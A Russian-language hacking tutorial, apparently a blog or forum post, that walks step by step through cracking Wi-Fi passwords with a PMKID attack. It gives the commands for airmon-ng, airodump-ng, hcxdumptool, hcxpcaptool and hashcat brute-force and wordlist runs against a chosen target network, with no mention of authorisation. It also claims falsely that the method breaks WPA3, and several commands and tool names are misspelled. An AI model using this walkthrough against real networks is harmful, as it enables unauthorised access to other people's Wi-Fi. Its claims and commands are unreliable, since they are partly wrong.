Привет всем, я уверен, что вы знаете о таком протоколе шифрования как WPA2, который на данный момент является самым распространенным и безопасным протоколам для защиты точек доступа.
Однако, небольшое количество людей знает о том, что Wi-Fi Alliance предоставили новейший протокол шифрования, не трудно догадаться, что он называется WPA3
Этот протокол делает скачок в сфере безопасности, но вместе с тем и подрывает способы взлома вайфая.
На данный момент протокол не распространяется глобально, поэтому лучше заранее узнать о том, как же его все-таки взломать. И как оказывается, он есть.
А сейчас минуточку – данный способ взлома работает не только на новом протоколе WPA3 но и на нашем привычном и старом WPA2.
Поэтому данный метод становится и останется актуальным еще длительное время.
Главным достоинством данного метода является то, что для взлома не требуется перехватывать хеншейк, а это значит, что проводить взлом можно даже тогда, когда к сети никто не подключен.
Начнем:
В качестве примера будет рассматриваться взлом на системе Debian
Первым делом нам нужно подготовить все необходимые инструменты, будет хорошо, если они уже вас есть. Вот полный список:
1. airmon-ng + airodump-ng
2. hcxdumptool
3. hcxpcaptool
4. hashcat
Итак, приступим к самому делу!
Сначала нам нужно перевести нашу карту в режим монитора, делается это следующей командой:
sudo airmon-ng start wlan0
Чтобы узнать название собственного Wi-Fi интерфейса, нам нужно ввести команду ifconfig
Отлично, теперь мы должны перехватывать пакеты благодаря работе программы airodump. Пишем следующую команду:
sudo airodump-ng wlan0mon
wlan0mon – это наш интерфейс монитора, узнаем мы его когда введем команду ifconfig, как только будет введена первая команда.
Мы увидим вот такую вот картину:
Из этого обширного списка нам нужно выбрать самый устойчивый. После чего нам нужно сохранить его BSSID
Echo “0CB6D2599781” > filter.txt
Не забудьте, что BSSID нужно записывать без данных знаков “:”
Мы уже близко, переходим к самой важной части этого процесса.
Нам необходимо заполучить Pmkid точки, это сделать можно с помощью данной команды:
sudo hcxdumptool -o hash -i wlan0mon --filterlist=filter.txt --filtermode=2 --enable_status=1,2
Если вы хотите узнать значения ключей, то вы сможете их прочитать, просто наберите команду hcxdumptool -h
Вот список основных ключей: --o hash в нем как раз-таки и хранится необходимый Pmkid. --i wlanomon является интерфейсом карты мониторинга. --filterlist наш ранее сохраненный bssid.
Конда вы введете команду, то вы сможете наблюдать примерно такую ситуацию:
Теперь, после того как вы заметите надпись [FOUND PMIKD] то сразу нажимаем комбинацию клавиш для копирования в буфер обмена и начинаем процесс расшифровки. Для этого нужно перевести полученный pmkid в читаемый вид для hashcat:
sudo hcxcaptool -z hashtocrack hash
После этого нам нужно зарядить наш Hascat
Для этого мы воспользуется брутом, а это как вы знаете подбор паролей, совершается он с помощью такой команды:
sudo hashcat -m 16800 hashtocrack -a 3 -w 3 '?d?d?d?d?d?d?d?d' –force
'?d?d?d?d?d?d?d?d' – является маской. С помощью маски вы сможете прочесть доки hashcat
Теперь, что перебрать по словарю, пользуемся данной командой:
sudo hashcat -m 16800 hashtocrack wordlist.txt --force
Хочется сказать о том, что брут производится с помощью видеокарты, благодаря маске из 8 цифр, а если быть точнее, то это более 10 миллионов паролей, и занимает это менее часа. Работа со словарями также довольно быстра.